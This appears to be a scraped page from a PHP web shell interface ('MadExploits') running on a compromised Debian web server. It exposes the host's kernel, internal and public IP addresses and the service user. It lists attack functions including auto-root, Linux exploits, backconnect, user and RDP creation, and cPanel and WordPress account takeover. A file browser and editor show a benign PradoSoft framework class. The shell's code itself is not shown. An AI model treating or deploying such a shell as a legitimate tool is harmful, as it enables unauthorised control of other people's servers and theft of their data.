Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.186.132
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
framework /
Web /
UI /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveControls
[ DIR ]
drwxr-xr-x
WebControls
[ DIR ]
drwxr-xr-x
TCachePageStatePersister.php
5.9
KB
-rw-r--r--
TClientScriptManager.php
23.2
KB
-rw-r--r--
TCompositeControl.php
966
B
-rw-r--r--
TControl.php
66.37
KB
-rw-r--r--
TControlAdapter.php
3.48
KB
-rw-r--r--
TForm.php
4.3
KB
-rw-r--r--
THtmlWriter.php
5.1
KB
-rw-r--r--
TPage.php
36.97
KB
-rw-r--r--
TPageStatePersister.php
1.63
KB
-rw-r--r--
TSessionPageStatePersister.php
3.76
KB
-rw-r--r--
TTemplateControl.php
6.54
KB
-rw-r--r--
TTemplateControlInheritable.ph...
3.56
KB
-rw-r--r--
TTemplateManager.php
34.7
KB
-rw-r--r--
TThemeManager.php
13.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TControlAdapter.php
<?php /** * TControlAdapter class file. * * @author Qiang Xue <qiang.xue@gmail.com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Web.UI */ /** * TControlAdapter class * * TControlAdapter is the base class for adapters that customize * various behaviors for the control to which the adapter is attached. * * @author Qiang Xue <qiang.xue@gmail.com> * @package System.Web.UI * @since 3.0 */ class TControlAdapter extends TApplicationComponent { /** * @var TControl the control to which the adapter is attached */ protected $_control; /** * Constructor. * @param TControl the control to which the adapter is attached */ public function __construct($control) { $this->_control=$control; } /** * @return TControl the control to which this adapter is attached */ public function getControl() { return $this->_control; } /** * @return TPage the page that contains the attached control */ public function getPage() { return $this->_control?$this->_control->getPage():null; } /** * Creates child controls for the attached control. * Default implementation calls the attached control's corresponding method. */ public function createChildControls() { $this->_control->createChildControls(); } /** * Loads additional persistent control state. * Default implementation calls the attached control's corresponding method. */ public function loadState() { $this->_control->loadState(); } /** * Saves additional persistent control state. * Default implementation calls the attached control's corresponding method. */ public function saveState() { $this->_control->saveState(); } /** * This method is invoked when the control enters 'OnInit' stage. * Default implementation calls the attached control's corresponding method. * @param TEventParameter event parameter to be passed to the event handlers */ public function onInit($param) { $this->_control->onInit($param); } /** * This method is invoked when the control enters 'OnLoad' stage. * Default implementation calls the attached control's corresponding method. * @param TEventParameter event parameter to be passed to the event handlers */ public function onLoad($param) { $this->_control->onLoad($param); } /** * This method is invoked when the control enters 'OnPreRender' stage. * Default implementation calls the attached control's corresponding method. * @param TEventParameter event parameter to be passed to the event handlers */ public function onPreRender($param) { $this->_control->onPreRender($param); } /** * This method is invoked when the control enters 'OnUnload' stage. * Default implementation calls the attached control's corresponding method. * @param TEventParameter event parameter to be passed to the event handlers */ public function onUnload($param) { $this->_control->onUnload($param); } /** * This method is invoked when the control renders itself. * Default implementation calls the attached control's corresponding method. * @param THtmlWriter writer for the rendering purpose */ public function render($writer) { $this->_control->render($writer); } /** * Renders the control's children. * Default implementation calls the attached control's corresponding method. * @param THtmlWriter writer for the rendering purpose */ public function renderChildren($writer) { $this->_control->renderChildren($writer); } }
Close